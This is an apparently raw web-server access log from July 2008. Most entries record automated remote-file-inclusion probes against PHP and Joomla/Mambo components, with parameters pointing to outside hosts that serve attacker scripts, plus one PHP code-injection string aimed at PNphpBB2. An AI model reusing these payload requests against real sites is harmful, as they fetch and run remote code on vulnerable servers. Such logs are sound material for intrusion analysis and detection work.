64.185.238.20 - - [06/Jul/2008:10:58:11 -0700] "GET /logs//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.160.189.11 - - [06/Jul/2008:10:58:17 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [06/Jul/2008:10:58:17 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [06/Jul/2008:10:58:25 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [06/Jul/2008:10:58:25 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.37 - - [06/Jul/2008:10:58:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.37 - - [06/Jul/2008:10:58:27 -0700] "GET /logs/access_080514.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:58:35 -0700] "GET /logs/access_080215.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:58:35 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:58:35 -0700] "GET /logs/access_080120.log//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:10:58:49 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:58:56 -0700] "GET /logs/access_080103.log//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:58:57 -0700] "GET //starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:58:57 -0700] "GET /logs//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:58:59 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:58:59 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:10:59:18 -0700] "GET /logs/access_080128.log//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:10:59:18 -0700] "GET //mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:10:59:18 -0700] "GET /logs//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.3.32.28 - - [06/Jul/2008:10:59:24 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 566288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:10:59:36 -0700] "GET /logs/access_080128.log//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:10:59:36 -0700] "GET //mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:10:59:36 -0700] "GET /logs//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.229 - - [06/Jul/2008:10:59:37 -0700] "GET /logs/access_071225.log//includes?vwar_root=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:10:59:40 -0700] "GET /logs/access_080120.log//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:59:46 -0700] "GET /logs/db.php?path_local=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:59:46 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:59:46 -0700] "GET /db.php?path_local=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:59:46 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:59:47 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.12.137.20 - - [06/Jul/2008:11:00:07 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:11:00:22 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:11:00:29 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18595 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:00:43 -0700] "GET /logs/access_080329.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:01:07 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.112 - - [06/Jul/2008:11:01:09 -0700] "GET /?D=A HTTP/1.0" 200 18257 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:01:32 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:01:54 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:01:54 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:02:10 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:11:02:11 -0700] "GET /logs/access_080220.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:02:11 -0700] "GET //index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 200 18463 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:02:11 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:11:02:14 -0700] "GET /logs//includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:11:02:14 -0700] "GET //includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:02:17 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:02:18 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:02:19 -0700] "GET //index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 200 18475 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [06/Jul/2008:11:02:19 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:02:51 -0700] "GET /logs/access_080312.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:03:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:03:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:11:03:03 -0700] "GET /logs/access_080220.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.219.5.233 - - [06/Jul/2008:11:03:09 -0700] "GET /logs/access_080128.log/modules/My_eGallery/index.php?basepath=http://raru.freetzi.com/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:03:22 -0700] "GET /logs/access_080225.log/index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:03:22 -0700] "GET /logs/access_080225.log/index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:03:22 -0700] "GET /logs/access_080225.log/index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:03:23 -0700] "GET /index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:03:23 -0700] "GET /logs/index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:03:25 -0700] "GET /index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:03:25 -0700] "GET /index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:03:25 -0700] "GET /logs/index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:03:25 -0700] "GET /logs/index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:11:03:53 -0700] "GET /logs/access_080313.log//claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:04:25 -0700] "GET //atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:11:04:30 -0700] "GET /logs/errors.php?error=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [06/Jul/2008:11:04:30 -0700] "GET /errors.php?error=http://www.amigurumiland.com/mc-root/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.30.73.117 - - [06/Jul/2008:11:04:45 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:11:04:50 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:04:51 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:04:52 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:04:52 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:04:53 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:04:53 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:04:53 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:11:05:31 -0700] "GET /logs/access_080220.log//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.213.57 - - [06/Jul/2008:11:05:31 -0700] "GET /logs/access_080220.log//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.iglesialcs.cl/newweb//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:06:13 -0700] "GET /logs/access_080117.log/index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:06:13 -0700] "GET /logs/access_080117.log/index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:11:06:13 -0700] "GET /logs/access_080117.log/index.php?body=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:06:28 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:06:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 200 3694 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:06:30 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:06:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 200 3694 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.236.255.134 - - [06/Jul/2008:11:06:35 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.236.255.134 - - [06/Jul/2008:11:06:38 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:06:38 -0700] "GET /logs//atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:06:39 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:06:41 -0700] "GET //index.php?option=com_custompages&cpage=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 200 18493 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:06:51 -0700] "GET /logs/access_080225.log/index.php?body=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:06:55 -0700] "GET /index.php?body=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 200 18463 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:06:56 -0700] "GET /logs/index.php?body=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:07:01 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.8.25 - - [06/Jul/2008:11:07:09 -0700] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://amordebicho.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.8.25 - - [06/Jul/2008:11:07:09 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://amordebicho.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.8.25 - - [06/Jul/2008:11:07:09 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://amordebicho.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:07:35 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:07:35 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:07:36 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:08:03 -0700] "GET /logs/access_080315.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:08:04 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.3.74.226 - - [06/Jul/2008:11:08:23 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.251.172 - - [06/Jul/2008:11:08:40 -0700] "GET //index.php?option=com_custompages&cpage=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18479 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:08:41 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:08:42 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:08:44 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:08:55 -0700] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:08:57 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:09:06 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:09:11 -0700] "GET /logs/access_080312.log//atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:09:14 -0700] "GET /logs/access_080313.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.16.50.217 - - [06/Jul/2008:11:09:32 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.31 - - [06/Jul/2008:11:09:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.31 - - [06/Jul/2008:11:09:53 -0700] "GET /logs/access_080106.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
212.227.251.172 - - [06/Jul/2008:11:10:01 -0700] "GET //index.php?root_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18433 "-" "libwww-perl/5.805" "www.dmulk.com"
